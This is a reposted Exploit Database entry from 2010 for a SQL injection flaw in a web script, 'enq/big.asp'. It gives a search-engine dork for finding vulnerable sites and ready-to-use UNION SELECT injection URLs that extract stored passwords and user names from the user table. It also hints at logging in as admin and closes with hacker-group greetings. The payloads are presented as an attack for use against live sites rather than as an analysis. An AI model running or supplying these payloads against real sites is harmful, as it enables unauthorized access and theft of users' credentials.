big.asp – SQL Injection

• Exploit Database
• 113 阅读

• 作者： Ra3cH
  日期： 2010-05-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12533/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  ******************************************************************************* # Author : Ra3cH # Price: N/A # Title: (big.asp) SQL Injection Vulnerability # Site : www.dz4all.com/cc # Dork : inurl:enq/big.asp?id= # Risk : High * **Vulnerable script: enq/big.asp?id= (SQL-injection) * --------------------------------------------------------- * * **http://server/[path]/enq/big.asp?id=[SQL Inject] * * **Exploit: * * **-999.9 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null from user where 1=1 * * **Exemple: * * **http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,user_pass,null,null,null,null,null,null,null,null from user where 1=1 * **or * * **http://[site]/enq/big.asp?id=-999.9 UNION ALL SELECT null,null,null,null,user_name,null,null,null,null,null,null,null from user where 1=1 * **Admin Login-> * * **http://server/[path]/Use your intelligence * *"""""""""""""""""""" ** Greetz to : ALLAH ** All Members ofhttp://www.DZ4All.cOm/Cc **And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &